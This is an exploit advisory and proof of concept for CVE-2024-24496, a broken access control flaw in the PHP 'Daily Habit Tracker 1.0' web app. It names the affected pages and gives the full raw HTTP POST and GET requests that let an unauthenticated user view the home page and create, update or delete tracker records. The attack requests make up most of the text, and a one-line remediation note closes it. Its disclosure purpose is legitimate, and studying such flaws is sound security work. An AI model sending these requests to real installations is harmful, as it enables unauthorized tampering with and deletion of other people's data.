# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24496

### Broken Access Control:

> Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them.

### Affected Components:

> home.php, add-tracker.php, delete-tracker.php, update-tracker.php

### Description:

> Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials.

## Proof of Concept:

### Unauthenticated Access to Home page

> To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page.

### Create Tracker as Unauthenticated User

To create a tracker, use the following request:

```
POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes
```

### Update Tracker as Unauthenticated User

To update a tracker, use the following request:

```
POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes
```

### Delete Tracker as Unauthenticated User:

To delete a tracker, use the following request:

```
GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```

## Recommendations

When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.